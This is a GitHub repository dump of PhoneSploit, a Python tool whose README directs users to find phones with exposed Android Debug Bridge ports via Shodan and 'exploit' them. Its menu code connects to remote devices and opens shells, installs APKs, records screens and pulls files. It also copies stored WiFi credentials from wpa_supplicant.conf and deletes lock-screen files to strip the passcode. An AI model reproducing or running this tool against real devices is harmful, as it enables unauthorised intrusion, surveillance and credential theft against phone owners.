├── README.md ├── Screenshot.png ├── adb.rar ├── main.py └── main_linux.py /README.md: -------------------------------------------------------------------------------- 1 | # Recent News (New Update v.1.2) 2 | Port Forwarding
NetStat
3 | Grab wpa_supplicant
Turn WiFi On/Off
4 | Show Mac/Inet
Remove Password
5 | Extract apk from app
Use Keycode
6 | Get Battery Status
Get Current Activity
7 | 8 | # PhoneSploit 9 | Using open Adb ports we can exploit a device 10 |
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3A”Android+Debug+Bridge” 11 |
12 |
To find out how to access a local device --> https://www.youtube.com/watch?v=u__PT3JpDx4 13 | 14 | 15 | # HOW TO INSTALL WINDOWS 16 | ``` 17 | git clone https://github.com/Zucccs/PhoneSploit 18 | extract adb.rar to the phonesploit directory 19 | cd PhoneSploit 20 | pip install colorama 21 | python2 main.py 22 | ``` 23 | 24 | # HOW TO INSTALL Linux 25 | ``` 26 | git clone https://github.com/Zucccs/PhoneSploit 27 | cd PhoneSploit 28 | pip install colorama 29 | python2 main_linux.py 30 | ``` 31 | 32 | 33 | # VIDEO 34 | [![Watch the video](https://img.youtube.com/vi/6XNf9s-PZxY/hqdefault.jpg)](https://www.youtube.com/watch?v=u__PT3JpDx4) 35 | 36 | # ScreenShots 37 | ![Screenshot](Screenshot.png) 38 | -------------------------------------------------------------------------------- /Screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ByteUprise/Phonesploit/a8ddd8c6ca964f08dc8030401c8952d93da1bb3a/Screenshot.png -------------------------------------------------------------------------------- /adb.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ByteUprise/Phonesploit/a8ddd8c6ca964f08dc8030401c8952d93da1bb3a/adb.rar -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | # coding: latin-1 2 | 3 | #Coded By Zucccs 4 | # Enjoy 5 | 6 | 7 | #============================= 8 | #Imports 9 | 10 | import os 11 | import random 12 | import urllib2 13 | import time as t 14 | from colorama import Fore, init 15 | 16 | #============================= 17 | # Variables 18 | CurrentDir = os.path.dirname(os.path.abspath(__file__)) 19 | load_count = 0 20 | 21 | #============================= 22 | #Install Functions 23 | # def ColoringModeStartup(): 24 | # coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+") 25 | # line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline() 26 | # if 'true' in line: 27 | # init(convert=True) 28 | # main() 29 | # if 'false' in line: 30 | # windows=False 31 | # main() 32 | # if "NOT_LOADED" in line: 33 | # platform_choice = raw_input("Are you loading this script in (W)indows or (L)inux: ") 34 | # open(CurrentDir+"\\install\\coloring.txt", "w").close() 35 | # if platform_choice.lower() == 'w': 36 | # coloring_file.write("true") 37 | # else: 38 | # coloring_file.write("false") 39 | # yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE) 40 | # if yn == "n": 41 | # os.system("sudo apt install adb") 42 | # else: 43 | # main() 44 | 45 | #============================= 46 | # Graphics # http://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20 47 | 48 | arrow = Fore.RED + " └──>".decode("utf-8") + Fore.WHITE 49 | connect = Fore.RED + "│".decode("utf-8") + Fore.WHITE 50 | page2 = False 51 | 52 | logo_design_1 = (''' 53 | {0} ____ __ _____ __ _ __ 54 | / __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_ 55 | / /_/ / __ \/ __ \/ __ \/ _ \\__ \/ __ \ / / __ \/ / __/ 56 | {1} / ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_ 57 | /_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/ 58 | /_/''').format(Fore.GREEN, Fore.WHITE, Fore.RED) 59 | 60 | logo_design_2 = Fore.GREEN + ''' 61 | .;' `;, 62 | .;' ,;' `;, `;, {0}PhoneSploit 63 | .;' ,;' ,;' `;, `;, `;, 64 | :: :: : {1}( ){0} : :: :: {1}Coded by Zucccs / Metachar{0} 65 | ':. ':. ':. {1}/_\{0} ,:' ,:' ,:' 66 | ':. ':. {1}/___\{0} ,:' ,:' 67 | ':. {1}/_____\{0} ,:' 68 | {1}/ \\{0} 69 | '''.format(Fore.GREEN, Fore.WHITE, Fore.RED) 70 | 71 | logo_design_pre = ''' 72 | {0}╔═╗{1}┬ ┬┌─┐┌┐┌┌─┐{0}╔═╗{1}┌─┐┬ ┌─┐┬┌┬┐ 73 | {0}╠═╝{1}├─┤│ ││││├┤ {0}╚═╗{1}├─┘│ │ ││ │ 74 | {0}╩ {1}┴ ┴└─┘┘└┘└─┘{0}╚═╝{1}┴ ┴─┘└─┘┴ ┴ '''.format(Fore.GREEN, Fore.WHITE, Fore.RED) 75 | logo_design_3 = logo_design_pre.decode("utf-8") 76 | 77 | logo_design_4 = ''' 78 | \033[92m 79 | +hydNNNNdyh+ 80 | +mMMMMMMMMMMMMm+ 81 | `dMMm\033[0m:\033[92mNMMMMMMN\033[0m:\033[92mmMMd` 82 | hMMMMMMMMMMMMMMMMMMh 83 | \033[92m.. yyyyyyyyyyyyyyyyyyyy .. \033[0m Expoit time :) \033[92m 84 | \033[92m.mMMm`MMMMMMMMMMMMMMMMMMMM`mMMm. \033[0m Thanks for downloading!\033[92m 85 | \033[92m:MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 86 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 87 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 88 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 89 | -MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM- 90 | +yy+ MMMMMMMMMMMMMMMMMMMM +yy+ 91 | mMMMMMMMMMMMMMMMMMMm 92 | `/++MMMMh++hMMMM++/` 93 | MMMMo oMMMM 94 | MMMMo oMMMM 95 | oNMm- -mMNs''' 96 | 97 | logo_design_5 = ''' 98 | {0}______ {1}__ __ ______ __ __ ______ {0}______ {1}______ __ ______ __ ______ 99 | {0}/\ == \ {1}/\ \_\ \ /\ __ \ /\ "-.\ \ /\ ___\ {0}/\ ___\ {1}/\ == \ /\ \ /\ __ \ /\ \ /\__ _\ 100 | {0}\ \ _-/ {1}\ \ __ \ \ \ \/\ \ \ \ \-. \ \ \ __\ {0}\ \___ \ {1}\ \ _-/ \ \ \____ \ \ \/\ \ \ \ \ \/_/\ \/ 101 | {0}\ \_\ {1}\ \_\ \_\ \ \_____\ \ \_\\"\_\ \ \_____\ {0}\/\_____\ {1}\ \_\ \ \_____\ \ \_____\ \ \_\ \ \_\ 102 | {0}\/_/ {1}\/_/\/_/ \/_____/ \/_/ \/_/ \/_____/ {0}\/_____/ {1}\/_/ \/_____/ \/_____/ \/_/ \/_/ 103 | '''.format(Fore.WHITE, Fore.GREEN) 104 | 105 | logo_design_6 = Fore.RED + ''' 106 | ,____ 107 | |---.\\ 108 | ___ | ` PHONESPLOIT 109 | / .-\ ./=) 110 | | |"|_/\/| 111 | ; |-;| /_| REAP THE REWARDS 112 | / \_| |/ \ | 113 | / \/\( | 114 | | / |` ) | 115 | / \ _/ | 116 | /--._/ \ | 117 | `/|) | / 118 | / | | 119 | .' | | 120 | / \ | 121 | (_.-.__.__./ / 122 | 123 | ''' 124 | 125 | logo_design_7 = Fore.GREEN + ''' 126 | .o oOOOOOOOo OOOo 127 | Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO 128 | OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO 129 | OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' 130 | `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo 131 | .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO 132 | OOOOO '"OOOOOOOOOOOOOOOO"` oOO 133 | oOOOOOba. .adOOOOOOOOOOba .adOOOOo. 134 | oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO 135 | OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO 136 | "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" 137 | Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` 138 | : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . 139 | . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo 140 | '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': 141 | `$" `OOOO' `O"Y ' `OOOO' o . 142 | . . OP" : o . 143 | 144 | ''' 145 | 146 | page_1 = '''\n 147 | {0}[{1}1{0}] {2}Show Connected Devices {0}[{1}6{0}] {2}Screen record a phone {0}[{1}11{0}] {2}Uninstall an app 148 | {0}[{1}2{0}] {2}Disconect all devices {0}[{1}7{0}] {2}Screen Shot a picture on a phone {0}[{1}12{0}] {2}Show real time log of device 149 | {0}[{1}3{0}] {2}Connect a new phone {0}[{1}8{0}] {2}Restart Server {0}[{1}13{0}] {2}Dump System Info 150 | {0}[{1}4{0}] {2}Access Shell on a phone {0}[{1}9{0}] {2}Pull folders from phone to pc {0}[{1}14{0}] {2}List all apps on a phone 151 | {0}[{1}5{0}] {2}Install an apk on a phone {0}[{1}10{0}] {2}Turn The Device off {0}[{1}15{0}] {2}Run an app 152 | 153 | 154 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}p{0}] Next Page v1.2 155 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN) 156 | 157 | page_2 = '''\n 158 | {0}[{1}16{0}]{2} Port Forwarding {0}[{1}21{0}]{2} NetStat 159 | {0}[{1}17{0}]{2} Grab wpa_supplicant {0}[{1}22{0}]{2} Turn WiFi On/Off 160 | {0}[{1}18{0}]{2} Show Mac/Inet {0}[{1}23{0}]{2} Remove Password 161 | {0}[{1}19{0}]{2} Extract apk from app {0}[{1}24{0}]{2} Use Keycode 162 | {0}[{1}20{0}]{2} Get Battery Status {0}[{1}25{0}]{2} Get Current Activity 163 | 164 | 165 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}b{0}] Back to page one 166 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN) 167 | 168 | 169 | #============================= 170 | #Main 171 | def main(): 172 | page_num = 1 173 | option = raw_input(Fore.WHITE + "phonesploit"+Fore.RED + "(main_menu) "+Fore.WHITE + "> ") 174 | if option == '1': 175 | os.system("adb devices -l") 176 | elif option == '2': 177 | os.system("adb disconnect") 178 | elif option == '3': 179 | os.system("adb tcpip 5555") 180 | print (("\n[{0}+{1}] Enter a phones ip address.").format(Fore.RED, Fore.WHITE)) 181 | ip = raw_input (arrow+" phonesploit"+Fore.RED + "(connect_phone) "+Fore.WHITE + "> ") 182 | os.system("adb connect "+ip+":5555") 183 | 184 | elif option == '4': 185 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 186 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(shell_on_phone) "+Fore.WHITE + "> ") 187 | os.system("adb -s "+device_name+" shell") 188 | 189 | elif option == '5': 190 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 191 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ") 192 | print ((" "+connect)) 193 | print ((" [{0}+{1}]Enter the apk location.").format(Fore.RED, Fore.WHITE)) 194 | apk_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ") 195 | os.system("adb -s "+device_name+" install "+apk_location) 196 | print (Fore.GREEN + "Apk has been installed.") 197 | 198 | elif option == '6': 199 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 200 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ") 201 | print ((" "+connect)) 202 | print ((" [{0}+{1}] Please wait 3m its recording").format(Fore.RED, Fore.WHITE)) 203 | print ((" "+connect)) 204 | os.system("adb -s "+device_name+" shell screenrecord /sdcard/demo.mp4") 205 | print ((" [{0}+{1}]Enter where you would like the video to be saved.").format(Fore.RED, Fore.WHITE)) 206 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ") 207 | os.system("adb -s "+device_name+" pull /sdcard/demo.mp4 "+place_location) 208 | 209 | elif option == '7': 210 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 211 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ") 212 | os.system("adb -s "+device_name+" shell screencap /sdcard/screen.png") 213 | print ((" "+connect)) 214 | print ((" [{0}+{1}]Enter where you would like the screenshot to be saved.").format(Fore.RED, Fore.WHITE)) 215 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ") 216 | os.system("adb -s "+device_name+" pull /sdcard/screen.png "+place_location) 217 | 218 | elif option == '8': 219 | os.system("adb kill-server && adb start-server") 220 | 221 | elif option == '9': 222 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 223 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 224 | print ((" "+connect)) 225 | print ((" [{0}+{1}]Enter a file location on a device").format(Fore.RED, Fore.WHITE)) 226 | file_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 227 | print ((" "+connect)) 228 | print ((" [{0}+{1}]Enter where you would like the file to be saved.").format(Fore.RED, Fore.WHITE)) 229 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 230 | os.system("adb -s "+device_name+" pull "+file_location+" "+place_location) 231 | 232 | elif option == '10': 233 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 234 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(device_reboot) "+Fore.WHITE + "> ") 235 | os.system("adb -s "+device_name+ " reboot ") 236 | 237 | elif option == '11': 238 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 239 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ") 240 | print ((" "+connect)) 241 | print ((" [{0}+{1}]Enter a package name.").format(Fore.RED, Fore.WHITE)) 242 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ") 243 | os.system("adb -s "+device_name+" unistall "+package_name) 244 | 245 | elif option == '12': 246 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 247 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(log) "+Fore.WHITE + "> ") 248 | os.system('adb -s '+device_name+" logcat ") 249 | 250 | elif option == '13': 251 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 252 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(sys_info) "+Fore.WHITE + "> ") 253 | os.system("adb -s "+device_name+" dumpsys") 254 | 255 | elif option == '14': 256 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 257 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(package_manager) "+Fore.WHITE + "> ") 258 | os.system("adb -s " +device_name+ " shell pm list packages -f") 259 | main() 260 | 261 | elif option == '15': 262 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 263 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ") 264 | print ((" "+connect)) 265 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE)) 266 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ") 267 | os.system("adb -s "+device_name+" shell monkey -p "+package_name+" -v 500") 268 | main() 269 | 270 | elif option == '16': 271 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 272 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 273 | print ((" "+connect)) 274 | print ((" [{0}+{1}]Enter a port on the device.").format(Fore.RED, Fore.WHITE)) 275 | port_device = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 276 | print ((" "+connect)) 277 | print ((" [{0}+{1}]Enter a port to forward it too.").format(Fore.RED, Fore.WHITE)) 278 | forward_port = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 279 | os.system("adb -s "+device_name+" forward tcp:"+port_device+" tcp:"+forward_port) 280 | 281 | elif option == '17': 282 | try: 283 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 284 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ") 285 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C").format(Fore.RED, Fore.WHITE)) 286 | print ((" "+connect)) 287 | print ((" [{0}+{1}]Enter where you want the file to be saved.").format(Fore.RED, Fore.WHITE)) 288 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ") 289 | os.system("adb -s "+device_name+" shell "+"su -c 'cp /data/misc/wifi/wpa_supplicant.conf /sdcard/'") 290 | os.system("adb -s "+device_name+" pull /sdcard/wpa_supplicant.conf "+location) 291 | except KeyboardInterrupt: 292 | main() 293 | 294 | elif option == '18': 295 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 296 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(mac_inet) "+Fore.WHITE + "> ") 297 | os.system("adb -s " +device_name+ " shell ip address show wlan0") 298 | main() 299 | 300 | elif option == '19': 301 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 302 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 303 | print ((" "+connect)) 304 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE)) 305 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 306 | os.system("adb -s "+device_name+" shell pm path "+package_name) 307 | print ((" "+connect)) 308 | print ((" [{0}+{1}]Enter The path.looks like this /data/app/com.snapchat.android-qWgDcBiCEvANq6op_NPqeA==/base.apk").format(Fore.RED, Fore.WHITE)) 309 | path = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 310 | print ((" "+connect)) 311 | print ((" [{0}+{1}]Enter The location to store the apk: ") .format(Fore.RED, Fore.WHITE)) 312 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 313 | os.system("adb -s " +device_name+" pull "+path+" "+location) 314 | main() 315 | 316 | elif option == '20': 317 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 318 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(battery) "+Fore.WHITE + "> ") 319 | os.system("adb -s " +device_name+ " shell dumpsys battery") 320 | main() 321 | 322 | elif option == '21': 323 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 324 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(net_stat) "+Fore.WHITE + "> ") 325 | os.system("adb -s " +device_name+ " shell netstat") 326 | main() 327 | 328 | elif option == '22': 329 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 330 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wifi) "+Fore.WHITE + "> ") 331 | print ((" "+connect)) 332 | print ((" [{0}+{1}] To turn wifi back on you need the device to be pluged in.").format(Fore.RED, Fore.WHITE)) 333 | print ((" "+connect)) 334 | on_off = raw_input(Fore.WHITE + " ["+Fore.RED+"+"+Fore.WHITE+"]Would you like the wifi "+Fore.GREEN +"on"+Fore.WHITE +"/"+Fore.RED +"off "+Fore.WHITE) 335 | if on_off == 'off': 336 | command = " shell svc wifi disable" 337 | else: 338 | command = " shell svc wifi enable" 339 | 340 | os.system("adb -s "+device_name+command) 341 | 342 | elif option == '23': 343 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 344 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pass_remove) "+Fore.WHITE + "> ") 345 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C THIS IS ALSO UNTESTED").format(Fore.RED, Fore.WHITE)) 346 | print ((" "+connect)) 347 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************") 348 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/gesture.key'") 349 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db'") 350 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-wal'") 351 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-shm'") 352 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************") 353 | 354 | elif option == '24': 355 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 356 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ") 357 | print (''' 358 | 0 --> "KEYCODE_UNKNOWN" 359 | 1 --> "KEYCODE_MENU" 360 | 2 --> "KEYCODE_SOFT_RIGHT" 361 | 3 --> "KEYCODE_HOME" 362 | 4 --> "KEYCODE_BACK" 363 | 5 --> "KEYCODE_CALL" 364 | 6 --> "KEYCODE_ENDCALL" 365 | 7 --> "KEYCODE_0" 366 | 8 --> "KEYCODE_1" 367 | 9 --> "KEYCODE_2" 368 | 10 --> "KEYCODE_3" 369 | 11 --> "KEYCODE_4" 370 | 12 --> "KEYCODE_5" 371 | 13 --> "KEYCODE_6" 372 | 14 --> "KEYCODE_7" 373 | 15 --> "KEYCODE_8" 374 | 16 --> "KEYCODE_9" 375 | 17 --> "KEYCODE_STAR" 376 | 18 --> "KEYCODE_POUND" 377 | 19 --> "KEYCODE_DPAD_UP" 378 | 20 --> "KEYCODE_DPAD_DOWN" 379 | 21 --> "KEYCODE_DPAD_LEFT" 380 | 22 --> "KEYCODE_DPAD_RIGHT" 381 | 23 --> "KEYCODE_DPAD_CENTER" 382 | 24 --> "KEYCODE_VOLUME_UP" 383 | 25 --> "KEYCODE_VOLUME_DOWN" 384 | 26 --> "KEYCODE_POWER" 385 | 27 --> "KEYCODE_CAMERA" 386 | 28 --> "KEYCODE_CLEAR" 387 | 29 --> "KEYCODE_A" 388 | 30 --> "KEYCODE_B" 389 | 31 --> "KEYCODE_C" 390 | 32 --> "KEYCODE_D" 391 | 33 --> "KEYCODE_E" 392 | 34 --> "KEYCODE_F" 393 | 35 --> "KEYCODE_G" 394 | 36 --> "KEYCODE_H" 395 | 37 --> "KEYCODE_I" 396 | 38 --> "KEYCODE_J" 397 | 39 --> "KEYCODE_K" 398 | 40 --> "KEYCODE_L" 399 | 41 --> "KEYCODE_M" 400 | 42 --> "KEYCODE_N" 401 | 43 --> "KEYCODE_O" 402 | 44 --> "KEYCODE_P" 403 | 45 --> "KEYCODE_Q" 404 | 46 --> "KEYCODE_R" 405 | 47 --> "KEYCODE_S" 406 | 48 --> "KEYCODE_T" 407 | 49 --> "KEYCODE_U" 408 | 50 --> "KEYCODE_V" 409 | 51 --> "KEYCODE_W" 410 | 52 --> "KEYCODE_X" 411 | 53 --> "KEYCODE_Y" 412 | 54 --> "KEYCODE_Z" 413 | 55 --> "KEYCODE_COMMA" 414 | 56 --> "KEYCODE_PERIOD" 415 | 57 --> "KEYCODE_ALT_LEFT" 416 | 58 --> "KEYCODE_ALT_RIGHT" 417 | 59 --> "KEYCODE_SHIFT_LEFT" 418 | 60 --> "KEYCODE_SHIFT_RIGHT" 419 | 61 --> "KEYCODE_TAB" 420 | 62 --> "KEYCODE_SPACE" 421 | 63 --> "KEYCODE_SYM" 422 | 64 --> "KEYCODE_EXPLORER" 423 | 65 --> "KEYCODE_ENVELOPE" 424 | 66 --> "KEYCODE_ENTER" 425 | 67 --> "KEYCODE_DEL" 426 | 68 --> "KEYCODE_GRAVE" 427 | 69 --> "KEYCODE_MINUS" 428 | 70 --> "KEYCODE_EQUALS" 429 | 71 --> "KEYCODE_LEFT_BRACKET" 430 | 72 --> "KEYCODE_RIGHT_BRACKET" 431 | 73 --> "KEYCODE_BACKSLASH" 432 | 74 --> "KEYCODE_SEMICOLON" 433 | 75 --> "KEYCODE_APOSTROPHE" 434 | 76 --> "KEYCODE_SLASH" 435 | 77 --> "KEYCODE_AT" 436 | 78 --> "KEYCODE_NUM" 437 | 79 --> "KEYCODE_HEADSETHOOK" 438 | 80 --> "KEYCODE_FOCUS" 439 | 81 --> "KEYCODE_PLUS" 440 | 82 --> "KEYCODE_MENU" 441 | 83 --> "KEYCODE_NOTIFICATION" 442 | 84 --> "KEYCODE_SEARCH" 443 | 85 --> "TAG_LAST_KEYCODE" 444 | ''') 445 | print (("[{0}+{1}]Enter a number.").format(Fore.RED, Fore.WHITE)) 446 | num = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ") 447 | os.system("adb -s "+device_name+" shell input keyevent "+num) 448 | 449 | elif option == '25': 450 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 451 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(current_activity) "+Fore.WHITE + "> ") 452 | os.system("adb -s " +device_name+ " dumpsys activity") 453 | main() 454 | 455 | elif option == '0': 456 | global page2 457 | if page2 == True: 458 | clear(page_2) 459 | else: 460 | clear(page_1) 461 | 462 | elif option == 'p': 463 | os.system('cls') 464 | page2 = True 465 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 466 | print (Fore.RED + banner_title) 467 | print (page_2) 468 | 469 | elif option == 'b': 470 | os.system('cls') 471 | page2 = False 472 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 473 | print (Fore.RED + banner_title) 474 | print (page_1) 475 | 476 | elif option == '99': 477 | exit() 478 | 479 | 480 | main() 481 | 482 | #============================= 483 | 484 | def clear(page): 485 | global page2 486 | os.system('cls') 487 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4,logo_design_5,logo_design_6,logo_design_7]) 488 | print (Fore.RED + banner_title) 489 | print (page) 490 | 491 | 492 | 493 | #============================= 494 | # Run 495 | try: 496 | init(convert=True) 497 | os.chdir(CurrentDir+"//adb") 498 | print (Fore.RED + "Starting adb server..") 499 | os.system("adb tcpip 5555") 500 | t.sleep(4) 501 | os.system('cls') 502 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4,logo_design_5,logo_design_6,logo_design_7]) 503 | print (Fore.RED + banner_title) 504 | print (page_1) 505 | main() 506 | except KeyboardInterrupt: 507 | main() -------------------------------------------------------------------------------- /main_linux.py: -------------------------------------------------------------------------------- 1 | #-*- coding: utf-8 -*- 2 | 3 | #Coded By Zucccs 4 | # Enjoy 5 | 6 | 7 | #============================= 8 | #Imports 9 | import os 10 | import sys 11 | import random 12 | import time as t 13 | from colorama import Fore, init 14 | 15 | reload(sys) 16 | sys.setdefaultencoding("utf-8") 17 | 18 | #============================= 19 | # Variables 20 | CurrentDir = os.path.dirname(os.path.abspath(__file__)) 21 | load_count = 0 22 | 23 | #============================= 24 | #Install Functions 25 | # def ColoringModeStartup(): 26 | # coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+") 27 | # line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline() 28 | # if 'init' in line: 29 | # init(convert=True) 30 | # main() 31 | # if 'false' in line: 32 | # main() 33 | # if "NOT_LOADED" in line: 34 | # platform_choice = raw_input("Are you loading this script in (W)indows or (L)inux: ") 35 | # open(CurrentDir+"\\install\\coloring.txt", "w").close() 36 | # if platform_choice.lower() == 'w': 37 | # coloring_file.write("init") 38 | # else: 39 | # coloring_file.write("false") 40 | # yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE) 41 | # if yn == "n": 42 | # os.system("sudo apt install adb") 43 | # else: 44 | # main() 45 | 46 | #============================= 47 | # Graphics # http://patorjk.com/software/taag/#p=display&f=Graffiti&t=Type%20Something%20 48 | 49 | arrow = Fore.RED + " └──>".decode("utf-8").strip() + Fore.WHITE 50 | arrow = str(arrow) 51 | connect = Fore.RED + "│".decode("utf-8").strip() + Fore.WHITE 52 | 53 | logo_design_1 = (''' 54 | {0} ____ __ _____ __ _ __ 55 | / __ \/ /_ ____ ____ ___ / ___/____ / /___ (_) /_ 56 | / /_/ / __ \/ __ \/ __ \/ _ \\__ \/ __ \/ / __ \/ / __/ 57 | {1} / ____/ / / / /_/ / / / / __/__/ / /_/ / / /_/ / / /_ 58 | /_/ /_/ /_/\____/_/ /_/\___/____/ .___/_/\____/_/\__/ 59 | /_/''').format(Fore.GREEN, Fore.WHITE, 